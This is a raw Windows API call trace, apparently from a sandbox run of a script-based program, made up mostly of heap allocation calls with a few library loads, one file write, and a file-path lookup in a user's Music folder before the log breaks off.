[0181.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0181.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0181.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0181.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0181.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0181.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0181.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0181.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0181.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0181.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0181.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0181.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0181.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0181.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0181.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0181.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0181.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0181.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0181.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0181.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0181.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0181.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0181.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0181.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0181.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0181.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0181.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0181.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0181.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0181.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0181.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0181.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0181.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0181.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0181.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0181.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0181.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0181.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0181.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0181.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0181.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0181.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0181.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0181.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0181.942] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0181.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0181.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0181.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0181.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0181.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0181.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0181.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0181.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0181.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0181.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0181.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0181.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0181.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0181.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0181.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0181.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0181.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0181.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0181.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0181.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0181.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0181.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0181.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0181.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0181.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0181.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0181.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0181.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0181.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0181.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0181.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0181.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0181.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0181.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0181.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0181.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0181.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0181.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0181.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0181.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0181.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0181.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0181.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0181.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0181.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0181.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0181.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0181.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0181.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0181.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0181.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0181.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0181.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.945] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0181.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0181.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0181.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0181.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9bd3a8 [0181.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd3a8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0181.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0181.945] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0181.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0181.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0181.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0181.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0181.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0181.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0181.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0181.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0181.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0181.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0181.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0181.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0181.946] WriteFile (in: hFile=0x120, lpBuffer=0xbca008*, nNumberOfBytesToWrite=0x675e, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesWritten=0x87eae0*=0x675e, lpOverlapped=0x0) returned 1 [0181.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0181.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0181.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0181.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0181.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0181.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0181.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0181.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0181.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0181.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0181.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0181.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0181.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0181.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0181.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0181.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0181.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0181.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0181.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0181.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0181.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0181.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0181.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0181.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0181.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0181.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0181.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0181.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0181.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0181.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0181.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0181.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0181.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0181.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0181.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0181.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0181.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0181.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0181.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0181.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0181.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0181.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0181.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0181.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0181.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0181.948] FreeLibrary (hLibModule=0x75990000) returned 1 [0181.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0181.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0181.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0181.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0181.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0181.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0181.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0181.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0181.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0181.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0181.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0181.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0181.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0181.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0181.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0181.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0181.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0181.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0181.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0181.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0181.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0181.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0181.949] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0181.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0181.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0181.949] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0181.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0181.949] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0181.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0181.949] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0181.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0181.950] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0181.950] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0181.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0181.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0181.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0181.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0181.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0181.950] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0181.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0181.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0181.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0181.950] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0181.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0181.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0181.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0181.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd390 [0181.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd390, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0181.952] FreeLibrary (hLibModule=0x75990000) returned 1 [0181.952] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0181.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0181.952] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.952] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.952] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav", lpFilePart=0x0) returned 0x56 [0181.953] FindFirstFileW (in: 